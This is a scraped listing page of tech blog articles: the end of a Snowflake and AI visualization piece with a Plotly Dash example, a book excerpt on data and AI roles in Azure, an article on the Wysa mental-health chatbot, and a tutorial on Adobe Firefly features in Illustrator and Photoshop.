Interactive data explorationWith the help of AI-generated visualization, one can interact with the data effortlessly. The business can drill down, explore, and filter its data dynamically while gaining deeper insights into the real-time scenario. Such a level of interactivity empowers every business user to make informed data-driven decisions without heavily relying on IT teams or data analysts.Examples: import dash import dash_core_components as dcc import dash_html_components as html from dash.dependencies import Input, Output import plotly.express as px app = dash.Dash(__name__) # Define the layout of the web app app.layout = html.Div([    dcc.Graph(id='scatter-plot'),    dcc.Dropdown(        id='x-axis',        options=[            {'label': 'Feature 1', 'value': 'feature1'},            {'label': 'Feature 2', 'value': 'feature2'}        ],        value='feature1'    ) ]) # Define callback to update the scatter plot @app.callback(    Output('scatter-plot', 'figure'),    [Input('x-axis', 'value')] ) def update_scatter_plot(selected_feature):    fig = px.scatter(data_frame=scaled_data, x=selected_feature, y='target', title='Scatter Plot')    fig.update_traces(marker=dict(size=5))    return fig if __name__ == '__main__':    app.run_server(debug=True) From this web application, the users can interactively explore data.Benefits of AI and Snowflake for Enterprises●  Faster decision makingWith the help of code, generation, and data preprocessing automation, the business can enable faster decision-making. Also, the real-time interactive exploration helps in reducing the time it takes to derive specific insights from data.●  Democratize the data access.The AI-generated visualization helps every non-technical user explore data while democratizing access to insights. It reduces the bottleneck faced by the data science team and data analyst.●  Enhance predictive capabilitiesThe AI-powered predictive analytics present within Snowflake helps uncover hidden patterns and trends. It enables every enterprise and business to stay ahead of the competition and make proactive decisions.●  Cost efficiency and scalability The AI-driven automation and Snowflake's scalability ensures that business can handle large data sets without breaking the bank.Conclusion In summary, the combination of Snowflake Data Cloud and data visualization powered by AI is the game changer for enterprises and businesses looking to gain insights from their data. Aiding with automating code creation, simplifying data integration, and facilitating exploration, such collaboration empowers companies to make informed decisions based on data. As we progress in the field of data analytics, it will be crucial for organizations to embrace these technologies to remain competitive and unlock the potential of their data.With Snowflake and AI working together, exploring data evolves from being complicated and time-consuming to becoming interactive, enlightening, and accessible for everyone. Ultimately, this transformation revolutionizes how enterprises utilize the power of their data.Is this code a prompt or does the reader have to manually type? If the reader has to type, please share the text code so they can copy and paste it for convenience.Author BioShankar Narayanan (aka Shanky) has worked on numerous different cloud and emerging technologies like Azure, AWS, Google Cloud, IoT, Industry 4.0, and DevOps to name a few. He has led the architecture design and implementation for many Enterprise customers and helped enable them to break the barrier and take the first step towards a long and successful cloud journey. He was one of the early adopters of Microsoft Azure and Snowflake Data Cloud. Shanky likes to contribute back to the community. He contributes to open source is a frequently sought-after speaker and has delivered numerous talks on Microsoft Technologies and Snowflake. He is recognized as a Data Superhero by Snowflake and SAP Community Topic leader by SAP.
Read more
  • 0
  • 0
  • 7324

article-image-exploring-the-roles-in-building-azure-ai-solutions
Olivier Mertens, Breght Van Baelen
13 Sep 2023
19 min read
Save for later

Exploring the Roles in Building Azure AI Solutions

Olivier Mertens, Breght Van Baelen
13 Sep 2023
19 min read
This article is an excerpt from the book, Azure Data and AI Architect Handbook, by Olivier Mertens and Breght Van Baelen. Master core data architecture design concepts and Azure Data & AI services to gain a cloud data and AI architect’s perspective to developing end-to-end solutionsIntroductionArtificial Intelligence (AI) is transforming businesses across various industries rapidly. Especially w ith the surge in popularity of large language models such as ChatGPT, AI adoption is increasing exponentially. Microsoft Azure provides a wide range of AI services to help organizations build powerful AI solutions. In this chapter, we will explore the different AI services available on Azure, as well as the roles involved in building AI solutions, and the steps required to design, develop, and deploy AI models on Azure.Specifically, we will cover the following:The different roles involved in building AI solutionsThe questions a data architect should ask when designing an AI solutionBy the end of this article, you will have a good understanding of the role of the data architect in the world of data science. Additionally, you will have a high-level overview of what the data scientists and machine learning engineers are responsible for. Knowing the roles in data scienceThe Azure cloud offers an extensive range of services for use in advanced analytics and data science. Before we dive into these, it is crucial to understand the different roles in the data science ecosystem. In previous chapters, while always looking through the lens of a data architect, we saw workloads that are typically operationalized by data engineers, database administrators, and data analysts.Up until now, the chapters followed the journey of data through a data platform, from ingestion to raw storage to transformation, data warehousing, and eventually, visualization and dashboarding. The advanced analytics component is more separated from the entire solution, in the sense that most data architectures can perform perfectly without it. This does not take away from the fact that adding advanced analytics such as machine learning predictions can be a valuable enhancement to a  solution.The environment for advanced analytics introduces some new roles. The most prominent are the data scientist and the machine learning engineer, which we will look at in a bit more detail, starting with the following figure. Other profiles include roles such as data labelers and citizen data scientists.Figure 9.1 – An overview of the core components that each data role works withFigure 9.1 shows a very simplified data solution with a machine learning component attached to it. This consists of a workspace to build and train machine learning models and virtual machine clusters to deploy them in production.The data scientist is responsible for building and training the machine learning model. This is done through experimenting with data, most of the time stemming from the data lake. The data scientist will often use data from the bronze or silver tier in the data lake (i.e., the raw or semi-processed data). Data in the gold tier or the data warehouse is often transformed and aggregated in ways that make it convenient for business users to build reports with. However, the data scientist might want to perform different kinds of transformations, which focus more on the statistical relevance of certain features within the data to optimize the training performance of a machine learning model. Regardless, in some cases, data scientists will still interact with the gold layer and the data warehouse to pull clean data for experimentation.Using this data, data scientists will perform exploratory data analysis (EDA) to get initial insights into the dataset. This is followed by data cleaning and feature engineering, where features are transformed or new features are derived to serve as input for the machine learning model. Next up, a model is trained and evaluated, resulting in a first prototype. The experimentation does not stop here, however, as machine learning models have hyperparameters that can be adjusted, which might lead to increased performance, while still using the same dataset. This last process is called hyperparameter tuning. Once this is completed, we will arrive at the cutoff point between the responsibilities of a data scientist and a machine learning engineer.The machine learning engineer is responsible for the machine learning operations, often referred to as MLOps. Depending on the exact definition, this usually encompasses the later stages of the machine learning model life cycle. The machine learning engineer receives the finished model from the data scientist and creates a deployment for it. This will make the model available through an API so that it can be consumed by applications and users. In later stages, the model will need to be monitored and periodically retrained, until the end of its life cycle. This is a brief summary, but the MLOps process will be explained in more detail further in this chapter.Next, Figure 9.2 provides an overview of the processes that take place in the MLOps cycle and who the primary contributor to each step is.Figure 9.2 – The steps of the data science workflow and their executorsFinally, what we are most interested in is the role of the cloud data architect in this environment. First, the architect has to think about the overall AI approach, part of which is deciding whether to go for custom development or not. We will dive deeper into strategy soon.If custom machine learning model development is involved, the architect will have to decide on a data science environment, or workspace, where the data scientists can experiment.However, the architect will have more involvement in the work of a machine learning engineer. The optimal working of MLOps is considerably more dependent on good architectural design than the typical prototyping done by data scientists. Here, the architect is responsible for deciding on deployment infrastructure, choosing the right monitoring solutions, version control for models, datasets, code, retraining strategies, and so on.A lot of the value that an architect brings to machine learning projects comes from design choices outside of the data science suite. The data architect can greatly facilitate the work of data scientists by envisioning efficient data storing structures at the data lake level, with a strong focus on silver (and bronze) tiers with good data quality. Often, extra pipelines are required to get labeled data ready to be picked up by the data scientists. Designing AI solutionsIn this part, we will talk about the design of AI solutions, including qualification, strategy, and the responsible use of AI. Infusing AI into architecture has to be the result of some strategic consideration. The data architect should ask themself a series of questions, and find a substantiated answer, to end up with an optimal architecture.The first set of questions is regarding the qualification of a use case. Is AI the right solution?This can be further related to the necessity of an inductive solution, compared to a deductive one. Business rulesets are deductive; machine learning is inductive. Business rules will provide you with a solid answer if the condition for that rule is met. Machine learning models will provide you with answers that have a high probability but not certain ones.The big advantage of machine learning is its ability to cover cases in a much more granular manner,  whereas business rules must group various cases within a single condition so as to not end up with an absurd or even impossible number of rules. Look at image recognition, for example. Trying to make a rule set for every possible combination of pixels that might represent a human is simply impossible. Knowing this, evaluate the proposed use case and confirm that the usage (and correlating costs) of AI is justified for this solution.Do we opt for pre-trained models or a custom model?Although this question is more focused on implementation than qualification, it is crucial t o answer it fi rst, as this will directly impact the following two questions. As with most things in the broader field of IT, it comes down to not reinventing the wheel. Does your use case sound like something generic or industry-agnostic? Th en there are probably existing machine learning models, often with far superior performance (general knowledge-wise) than your own data could train a  model to have. Companies such as Microsoft and partners such as OpenAI invest heavily in getting these pre-trained models to cutting-edge standards.It may be that the solution you want to create is fairly generic, but there are certain aspects that make it a bit more niche. An example could be a text analytics model in the medical industry. Text analytics models are great at the general skill of language understanding, but they might have some issues with grasping the essence of industry-specific language out of the box. In this case, an organization can provide some of its own data to fine-tune the model to increase its performance on niche tasks, while maintaining most of the general knowledge from its initial training dataset. Most of the pre-trained AI models on Azure, which reside in Azure Cognitive Services and Azure OpenAI Service, are fine tuneable. When out-of-the-box models are not an option, then we need to look at custom development. Is data available?If we opt for custom development, we will need to bring our own data. The same goes for wanting to fine-tune an existing model, yet to a lesser extent. Is the data that we need available? Does an organization have a significant volume of historical data stored already in a central location? If this data is still spread across multiple platforms or sources, then this might indicate it is not the right time to implement AI. It would be more valuable to focus on increased data engineering efforts in this situation. In the case of machine learning on Azure, data is ideally stored in tiers in Azure Data Lake Storage.Keep in mind that machine learning model training does not stop after putting it into production. Th e performance of the production model will be constantly monitored, and if it starts to drift over time, retraining will take place. Do the sources of our current historical data still generate an adequate volume of data to carry out retraining?In terms of data volume, there is still a common misunderstanding that large volumes of data are a necessity for any high-performant model. It’s key to know here that even though the performance of a model still scales with the amount of training data, more and more new techniques have been developed to allow for valuable performance levels to be reached with a limited data volume. Is the data of acceptable quality?Just like the last question, this only counts for custom development or fine-tuning. Data quality between sources can differ immensely. There are different ways in which data can be of bad quality. Some issues can be solved easily; others can be astonishingly hard. Some examples of poor data quality are as follows:Inaccurate data: This occurs when data is incorrect or contains errors, such as typos or missing values. This is not easy to solve and will often result in fixes required at the source.Incomplete data: This occurs when data is missing important information or lacks the necessary details to be useful. In some cases, data scientists can use statistics to impute missing data. In other cases, it might depend on the specific model that is being developed. Certain algorithms can perform well with sparse data, while others are heavily affected by it. Knowing which exact algorithms should not be in the scope of the architect but, rather, the data scientists. Outdated data: This occurs when data is no longer relevant or useful due to changes in circumstances or the passage of time. If this data is statistically dissimilar to data generated in the present, it is better to remove this data from the training dataset.Duplicated data: This occurs when the same data is entered multiple times in different places, leading to inconsistencies and confusion. Luckily, this is one of the easiest data quality issues to solve. Biased data: This occurs when data is influenced by personal biases or prejudices, leading to inaccurate or unfair conclusions. This can be notoriously hard to solve and is a well-known issue in the data science world. We will come back to this later when discussing responsible AI.This concludes the qualifying questions on whether to implement AI or not. There is one more important topic, namely the return on investment (ROI) of the addition, but to calculate the investment, we need to have more knowledge on the exact implementation. This will be the focus of the next set of questions. Low code or code first?The answer to which approach should be chosen depends on people, their skill sets, and the complexity of the use case. In the vast majority of cases, code-fi first solutions are preferred, as it comes with considerably more flexibility and versatility. Low code simplifies development a lot, often by providing drag and drop interfaces to create workflows (or, in this case, machine learning pipelines). While low-code solutions often benefit from rapid development, this advantage in speed is slowly shrinking. Due to advancements in libraries and packages, generic code-fi first models are also being developed in a shorter amount of time than before.While code-first solutions cover a much broader set of use cases, they are simply not possible for every organization. Data scientists tend to be an expensive resource and are often fought over , with competition due to a lack of them in the labor market. Luckily, low-code platforms are advancing fast to address this issue. This allows citizen data scientists (non-professionals) to create and train machine learning models easily, although it will still yield inferior performance compared to professional code-first development.As a rule of thumb, if a professional data science team is present and it has already been decided that custom development is the way forward, choose a code-fi rst solution. What are the requirements for the AI model?Now, we will dive deeper into the technicalities of machine learning models. Note that not all answers here must come from the data architect. It is certainly a plus if the architect can think about things such as model selection with the data scientists, but it is not expected of the role. Leave it to the data science and machine learning team to have a clear understanding of the technical requirements for the AI model and allow them to leverage their expertise.The minimum accepted performance is probably the most straightforward. This is a defined threshold on the primary metric of a model, based on what is justifiable for the use case to progress. For instance, a model might need to have a minimum accuracy of 95% to be economically viable and continue toward production.Next, latency is an important requirement when the model is used to make real-time predictions. The larger the model and the more calculations that need to happen (not counting parallelism), the longer it will take to make a prediction. Some use cases will require a prediction latency within milliseconds, which can be solved with lightweight model selection and specialized infrastructure.Another requirement is the size of the model, which directly relates to the hosting costs when deployed into production, as the model will have to be loaded in RAM while the deployment runs. This is mostly a very binding requirement for IoT Edge use cases, where AI models are deployed on a small IoT device and make predictions locally before sending their results to the cloud. These devices often have very limited memory, and the data science team will have to figure out what the most efficient model is to fit on the device.With the recently growing adoption of large language models (LLMs), such as the GPT-model family, power consumption has started to become an increasingly important topic as well. Years ago, this was a negligible topic in most use cases, but with the massive size of today’s cutting-edge models, it is unavoidable. Whether these models are hosted privately or in the cloud, power consumption will be an incurred cost directly or indirectly. For natural language use cases specifically, consider whether the traditional (and significantly cheaper) text analytics models in Azure Cognitive Services can do the job at an acceptable level before heading straight for LLMs. Batch or real-time inferencing?When a model is finished and ready for deployment, the architect will have to decide on the type of deployment. On a high level, we should decide whether the model will be used for either batch scoring or predicting in real-time.Typically, when machine learning predictions are used to enrich data, which is already being batch processed in an OLAP scenario, the machine learning model can do periodical inferencing on large batches. The model will then be incorporated as an extra transformation step in the ETL pipeline. When using machine learning models in applications, for example, where users expect an instant prediction, real-time endpoints are required.When deploying our model to an endpoint, the architecture might differ based on the type of inferencing, which we will look into in more depth later in this chapter. Is explainability required?Explainable AI, often referred to as XAI, has been on the rise for quite a while now. For traditional machine learning models, it was straightforward to figure out why a model came to which conclusion, through statistical methods such as feature importance. With the rise of deep learning models, which are essentially black-box models, we come across more and more predictions that cannot be explained.Techniques have been developed to make an approximation of the decision-making process of a black box model. For instance, in the case of the mimic explainer, a traditional (and by nature interpretable) machine learning model is trained to mimic the black-box model and extract things, such as feature importance, from the mimic model. However, this is still an approximation and no guarantee.Therefore, it is key to figure out how crucial explainability is for the use case. In cases that (heavily) affect humans, such as predicting credit scoring using AI, interpretability is a must. In cases with minimal or no impact on human lives, interpretability is more of a nice-to-have. In this instance, we can opt for a black-box model if this provides increased predictive performance. What is the expected ROI?When the qualifying questions have been answered and decisions have been made to fulfill technical requirements, we should have sufficient information to calculate an estimated ROI. This will be the final exercise before giving the green light to start implementation, or at least the development of a proof of concept.If we know what approach to use, what kind of models to train, and which type of deployment to leverage, we can start mapping it to the right Azure service and perform a cost calculation. This is compared to the expected added value of a machine learning model.Optimal performance of a machine learning modelAs a side note to calculating the ROI, we need to have an idea of what the optimal performance level of a machine learning model is. This is where the academic and corporate worlds tend to differ. Academics focus on reaching the highest performance levels possible, whereas businesses will focus on the most efficient ratio between costs and performance. It might not make sense for a business to invest largely in a few percent increase in performance if this marginal increase is not justified by bringing adequate value to compensate.ConclusionThis article is focused on data science and AI on Azure. We started by outlining the different roles involved in a data science team, including the responsibilities of data architects, engineers, scientists, and machine learning engineers, and how the collaboration between these roles is key to building successful AI solutions.We then focused on the role of the data architect when designing an AI solution, outlining the questions they should ask themselves for a well-architected design.Author BioOlivier Mertens is a cloud solution architect for Azure data and AI at Microsoft, based in Dublin, Ireland. In this role, he assisted organizations in designing their enterprise-scale data platforms and analytical workloads. Next to his role as an architect, Olivier leads the technical AI expertise for Microsoft EMEA in the corporate market. This includes leading knowledge sharing and internal upskilling, as well as solving highly complex or strategic customer AI cases. Before his time at Microsoft, he worked as a data scientist at a Microsoft partner in Belgium.Olivier is a lecturer for generative AI and AI solution architectures, a keynote speaker for AI, and holds a master’s degree in information management, a postgraduate degree as an AI business architect, and a bachelor’s degree in business management.Breght Van Baelen is a Microsoft employee based in Dublin, Ireland, and works as a cloud solution architect for the data and AI pillar in Azure. He provides guidance to organizations building large-scale analytical platforms and data solutions. In addition, Breght was chosen as an advanced cloud expert for Power BI and is responsible for providing technical expertise in Europe, the Middle East, and Africa. Before his time at Microsoft, he worked as a data consultant at Microsoft Gold Partners in Belgium.Breght led a team of eight data and AI consultants as a data science lead. Breght holds a master’s degree in computer science from KU Leuven, specializing in AI. He also holds a bachelor’s degree in computer science from the University of Hasselt.
Read more
  • 0
  • 0
  • 7302
article-image-emotionally-intelligent-ai-transforming-healthcare-with-wysa
Julian Melanson
22 Jun 2023
6 min read
Save for later

Emotionally Intelligent AI: Transforming Healthcare with Wysa

Julian Melanson
22 Jun 2023
6 min read
Artificial Intelligence is reshaping the boundaries of industries worldwide, and healthcare is no exception. An exciting facet of this technological revolution is the emergence of empathetic AI, sophisticated algorithms designed to understand and respond to human emotions.The advent of AI in healthcare has promised efficiency, accuracy, and predictability. However, a crucial element remained largely unexplored: the human component of empathetic understanding. Empathy, defined as the capacity to understand and share the feelings of others, is fundamental to human interactions. Especially in healthcare, a practitioner's empathy can bolster patients' immune responses and overall well-being. Unfortunately, complex emotions associated with medical errors—such as hurt, frustration, and depression—often go unaddressed. Furthermore, emotional support is strongly correlated with the prognosis of chronic diseases such as cardiovascular disorders, cancer, and diabetes, underscoring the need for empathetic care. So how can we integrate empathy into AI? To find the answer, let's examine Wysa, an AI-backed mental health service platform.Wysa, leveraging AI's power, simulates a conversation with a chatbot to provide emotional support to users. It offers an interactive platform for people experiencing mood swings, stress, and anxiety, delivering personalized suggestions and tools to manage their mental health. This AI application extends beyond mere data processing and ventures into the realm of human psychology, demonstrating a unique fusion of technology and empathy.In 2022, the U.S. Food and Drug Administration (FDA) awarded Wysa the Breakthrough Device Designation. This designation followed an independent, peer-reviewed clinical trial published in the Journal of Medical Internet Research (JMIR). The study demonstrated Wysa's efficacy in managing chronic musculoskeletal pain and associated depression and anxiety, positioning it as a potential game-changer in mental health care.Wysa's toolset is primarily based on cognitive behavioral therapy (CBT), a type of psychotherapy that helps individuals change unhelpful thought patterns. It deploys a smartphone-based conversational agent to deliver CBT, effectively reducing symptoms of depression and anxiety, improving physical function, and minimizing pain interference.The FDA Breakthrough Device program is designed to expedite the development and approval of innovative medical devices and products. By granting this designation, the FDA acknowledged Wysa's potential to transform the treatment landscape for life-threatening or irreversibly debilitating diseases. This prestigious endorsement facilitates efficient communication between Wysa and the FDA's experts, accelerating the product's development during the premarket review phase.Wysa's success encapsulates the potential of empathetic AI to revolutionize healthcare. However, to fully capitalize on this opportunity, healthcare organizations need to revise and refine their strategies. An effective emotional support mechanism, powered by empathetic AI, can significantly enhance patient safety, satisfaction scores, and ultimately, the quality of life. For this to happen, continued development of technologies that cater to patients' emotional needs is paramount.While AI's emergence in healthcare has often been viewed through the lens of improved efficiency and decision-making, the human touch should not be underestimated. As Wysa demonstrates, AI has the potential to extend beyond its traditional boundaries and bring a much-needed sense of empathy into the equation. An emotionally intelligent AI could be instrumental in providing round-the-clock emotional support, thereby revolutionizing mental health care.As we advance further into the AI era, the integration of empathy into AI systems signifies an exciting development. AI platforms like Wysa, which blends technological prowess with human-like understanding, could be a pivotal force in transforming the healthcare landscape. As empathetic AI continues to evolve, it holds the promise of bridging the gap between artificial and human intelligence, ultimately enhancing patient care in the healthcare sector.A Step-By-Step Guide To Using WysaDownload the App: Android users can download Wysa from the Google Play Store. If you're an Apple user, you can find Wysa in the Apple App Store.Explore the App: Once installed, you can explore Wysa’s in-app activities which feature various educational modules, or “Packs”. These packs cover a range of topics, from stress management and managing anger, to coping with school stress and improving sleep.Engage with Wysa Bot: Each module features different “exercises” guided by the Wysa AI bot, a friendly penguin character. These exercises may involve question-answers, mindfulness activities, or short exercise videos. While all the modules can be viewed in the free app, only one exercise per module is accessible. To unlock the entire library, you’ll need to upgrade to the premium app.Consider Therapy Option: Wysa also offers a “therapy” option, which gives you access to a mental health coach and all the content in the premium version. Do note that this service is not formal therapy as provided by licensed therapists. The coaches are based in the US or India, and while they can offer support and encouragement, they are not able to provide diagnoses or treatment.Attend Live Sessions: Live sessions are carried out through instant messaging in the app, lasting for 30 minutes each week. In between these live sessions, you can message your coach at any time and usually expect at least a daily response.Complete Assigned Tasks: After each live session, your coach will assign you specific tasks to complete before your next session. You will complete these tasks guided by the Wysa AI bot.Maintain Anonymity: An important feature of Wysa is its respect for user privacy. The app doesn't require you to create an account, enter your real name, or provide an email address. To get started, all you need is a nickname.*Remember, Wysa is a tool designed to help manage stress and anxiety, improve sleep, and promote overall mental wellbeing. However, it does not replace professional psychological or medical advice. Always consult with a healthcare professional if you are in need of immediate assistance or dealing with severe mental health issues.SummaryArtificial intelligence (AI) is transforming healthcare in many ways, including by providing new tools for mental health management. One example of an AI-powered mental health app is Wysa, which uses conversational AI to help users cope with stress, anxiety, and depression. Wysa has been clinically proven to be effective in reducing symptoms of mental illness, and it can be used as a supplement to traditional therapy or as a standalone intervention.As AI continues to develop, it is likely that we will see even more innovative ways to use this technology to improve mental health care. AI-powered apps like Wysa have the potential to make mental health care more accessible and affordable, and they can also help to break down the stigma around mental illnesses.Author BioJulian Melanson is one of the founders of Leap Year Learning. Leap Year Learning is a cutting-edge online school that specializes in teaching creative disciplines and integrating AI tools. We believe that creativity and AI are the keys to a successful future and our courses help equip students with the skills they need to succeed in a continuously evolving world. Our seasoned instructors bring real-world experience to the virtual classroom and our interactive lessons help students reinforce their learning with hands-on activities.No matter your background, from beginners to experts, hobbyists to professionals, Leap Year Learning is here to bring in the future of creativity, productivity, and learning!
Read more
  • 0
  • 0
  • 7295

article-image-adobe-firefly-integrations-in-illustrator-and-photoshop
Joseph Labrecque
23 Aug 2023
12 min read
Save for later

Adobe Firefly Integrations in Illustrator and Photoshop

Joseph Labrecque
23 Aug 2023
12 min read
Adobe Firefly OverviewAdobe Firefly is a new set of generative AI tools which can be accessed via https://firefly.adobe.com/ by anyone with an Adobe ID. To learn more about Firefly… have a look at their FAQ:Image 1: Adobe FireflyFor more information around the usage of Firefly to generate images, text effects, and more… have a look at the previous articles in this series:       Animating Adobe Firefly Content with Adobe Animate       Exploring Text to Image with Adobe Firefly       Generating Text Effects with Adobe Firefly       Adobe Firefly Feature Deep Dive      Generative Fill with Adobe Firefly (Part I)      Generative Fill with Adobe Firefly (Part II)       Generative Recolor with Adobe Firefly       Adobe Firefly and Express (beta) IntegrationThis current Firefly article will focus on Firefly integrations within the release version of Adobe Illustrator and the public beta version of Adobe Photoshop.Firefly in Adobe IllustratorVersion 27.7 is the most current release of Illustrator at the writing of this article and this version contains Firefly integrations in the form of Generative Recolor (Beta).To access this, design any vector artwork within Illustrator or open existing artwork to get started. I’m using the cat.ai file that was used to generate the cat.svg file used in the Generative Recolor with Adobe Firefly article:Image 2: The cat vector artwork with original colors1.     Select the artwork you would like to recolor. Artwork must be selected for this to work.2.     Look to the Properties panel and locate the Quick Actions at the bottom of the panel. Click the Recolor quick action:Image 3: Choosing the Recolor Quick action3.     By default, the Recolor overlay will open with the Recolor tab active. Switch to the Generative Recolor (Beta) tab to activate it instead:Image 4: The Generative Recolor (Beta) view4.     You are invited to enter a prompt. I’ve written “northern lights green and vivid neon” as my prompt that describes colors I’d like to see. There are also sample prompts you can click on below the prompt input box.5.     Click the Generate button once a prompt has been entered:Image 5: Selecting a Recolor variantA set of recolor variants is presented within the overlay. Clicking on any of these will recolor your existing artwork according to the variant look:Image 6: Adding a specific color swatchIf you would like to provide even more guidance, you can modify the prompt and even add specific color swatches you’d like to see included in the recolored artwork.That’s it for Illustrator – very straightforward and easy to use!Firefly in Adobe Photoshop (beta)Generative Fill through Firefly is also making its way into Photoshop. While within Illustrator – we have Firefly as part of the current version of the software, albeit with a beta label on the feature, with Photoshop things are a bit different:Image 7: Generative Fill is only available in the Photoshop public betaTo make use of Firefly within Photoshop, the current release version will not cut it. You will need to install the public beta from the Creative Cloud Desktop application in order to access these features.With that in mind, let’s use Generative Fill in the Photoshop public beta to expand a photograph beyond its bounds and add in additional objects.1.     First, open a photograph in the Photoshop public beta. I’m using the Poe.jpg photograph that we previously used in the articles Generative Fill with Adobe Firefly (Parts I & II):Image 8: The original photograph in Photoshop2.     With the photograph open, we’ll add some extra space to the canvas to generate additional content and expand the image beyond its bounds. Summon the Canvas Size dialog by choosing Image > Canvas Size… from the application menu.3.     Change both the width and height values to 200 Percent:Image 9: Expanding the size of the canvas4.     Click the OK button to close the dialog and apply the change.The original canvas is expanded to 200 percent of its original size while the image itself remains exactly the same:Image 10: The photograph with an expanded canvasGenerative Fill, when used in this manner to expand an image, works best by selecting portions to expand bit by bit rather than all the expanded areas at once. It is also beneficial to select parts of the original image you want to expand from. This feeds and directs the Firefly AI.5.     Using the Rectangular Marquee tool, make such a selection across either the top, bottom, left, or right portions of the document:Image 11: Making a selection for Generative Fill6.     With a selection established, click Generative Fill within the contextual toolbar:Image 12: Leaving the prompt blank allows Photoshop to make all the decisions7.     The contextual toolbar will now display a text input where you can enter a prompt to guide the process. However, in this case, we want to simply expand the image based upon the original pixels selected – so we will leave this blank with no prompt whatsoever. Click Generate to continue.8.     The AI processes the image and displays a set of variants to choose from within the Properties panel. Click the one that conforms closest to the imagery you are looking to produce and that is what will be used upon the canvas:Image 13: Choosing a Generative Fill variantNote that if you look to the Layers panel, you will find a new layer type has been created and added to the document layer stack:Image 14: Generative Layers are a new layer type in PhotoshopThe Generative Layer retains both the given prompt and variants so that you can continue to make changes and adjustments as needed – even following this specific point in time.The resulting expansion of the original image as performed by Generative Fill can be very convincing! As mentioned before, this often works best by performing fills in a piece-by-piece patchwork manner:Image 15: The photograph with a variant applied across the selectionContinue selecting portions of the image using the Rectangular Marquee tool (or any selection tools, really) and generate new content the same way we have done so already – without supplying any text prompt to the AI:Image 16: The photograph with all expanded areas filled via generative AIEventually, you will complete the expansion of the original image and produce a very convincing deception.Of course, you can also guide the AI with actual text prompts. Let’s add in an object to the image as a demonstration.1.     Using the Lasso tool (or again… any selection tool), make a selection across the image in the form of what might hold a standing lamp of some sort:Image 17: Making an additional selection2.     With a selection established, click Generative Fill within the contextual toolbar.3.     Type in a prompt that describes the object you want to generate. I will use the prompt “tall rustic wooden and metal lamp”.4.     Click the Generate button to process the Generative Fill request:Image 18: A lamp is generated from our selection and text promptA set of generated lamp variants are established within the Properties panel. Choose the one you like the most and it will be applied within the image.You will want to be careful with how many Generative Layers are produced as you work on any single document. Keep an eye on the Layers panel as you work:Image 19: Each Generative Fill process produces a new layerEach time you use Generative Fill within Photoshop, a new Generative Layer is produced.Depending upon the resources and capabilities of your computer… this might become burdensome as everything becomes more and more complex. You can always flatten your layers to a single pixel layer if this occurs to free up additional resources.That concludes our overview of Generative Fill in the Photoshop public beta!Ethical Concerns with Generative AII want to make one additional note before concluding this series and that has to do with the ethics of generative AI. This concern goes beyond Adobe Firefly specifically – as it could be argued that Firefly is the least problematic and most ethical implementation of generative AI that is available today.See https://firefly.adobe.com/faq for additional details on steps Adobe has taken to ensure responsible AI through their use of Adobe Stock content to train their models, through the use of Content Credentials, and more...Like all our AI capabilities, Firefly is developed and deployed around our AI ethics principles of accountability, responsibility, and transparency.Data collection: We train our model by collecting diverse image datasets, which have been curated and preprocessed to mitigate against harmful or biased content. We also recognize and respect artists’ ownership and intellectual property rights. This helps us build datasets that are diverse, ethical, and respectful toward our customers and our community.Addressing bias and testing for safety and harm: It’s important to us to create a model that respects our customers and aligns with our company values. In addition to training on inclusive datasets, we continually test our model to mitigate against perpetuating harmful stereotypes. We use a range of techniques, including ongoing automated testing and human evaluation.Regular updates and improvements: This is an ongoing process. We will regularly update Firefly to improve its performance and mitigate harmful bias in its output. We also provide feedback mechanisms for our users to report potentially biased outputs or provide suggestions into our testing and development processes. We are committed to working together with our customers to continue to make our model better.-- AdobeI have had discussions with a number of fellow educators about the ethical use of generative AI and Firefly in general. Here are some paraphrased takeaways to consider as we conclude this article series:      “We must train the new generations in the respect and proper use of images or all kinds of creative work.”      “I don't think Ai can capture that sensitive world that we carry as human beings.”      “As dire as some aspects of all of this are, I see opportunities.”      “Thousands of working artists had their life's work unknowingly used to create these images.”       “Professionals will be challenged, truly, by all of this, but somewhere in that process I believe we will find our space.”      “AI data expropriations are a form of digital colonialism.”      “For many students, the notion of developing genuine skill seems pointless now.”     “Even for masters of the craft, it’s dispiriting to see someone type 10 words and get something akin to what took them 10 years.”I’ve been using generative AI for a few years now and can appreciate and understand the concerns expressed above - but also recognize that this technology is not going away. We must do what we can to address the ethical concerns brought up here and make sure to use our awareness of these problematic issues to further guide the direction of these technologies as we rapidly advance forward. These are very challenging times, right now. Author BioJoseph Labrecque is a Teaching Assistant Professor, Instructor of Technology, University of Colorado Boulder / Adobe Education Leader / Partner by DesignJoseph Labrecque is a creative developer, designer, and educator with nearly two decades of experience creating expressive web, desktop, and mobile solutions. He joined the University of Colorado Boulder College of Media, Communication, and Information as faculty with the Department of Advertising, Public Relations, and Media Design in Autumn 2019. His teaching focuses on creative software, digital workflows, user interaction, and design principles and concepts. Before joining the faculty at CU Boulder, he was associated with the University of Denver as adjunct faculty and as a senior interactive software engineer, user interface developer, and digital media designer.Labrecque has authored a number of books and video course publications on design and development technologies, tools, and concepts through publishers which include LinkedIn Learning (Lynda.com), Peachpit Press, and Adobe. He has spoken at large design and technology conferences such as Adobe MAX and for a variety of smaller creative communities. He is also the founder of Fractured Vision Media, LLC; a digital media production studio and distribution vehicle for a variety of creative works.Joseph is an Adobe Education Leader and member of Adobe Partners by Design. He holds a bachelor’s degree in communication from Worcester State University and a master’s degree in digital media studies from the University of Denver.Author of the book: Mastering Adobe Animate 2023 
Read more
  • 0
  • 0
  • 7258
Modal Close icon
Modal Close icon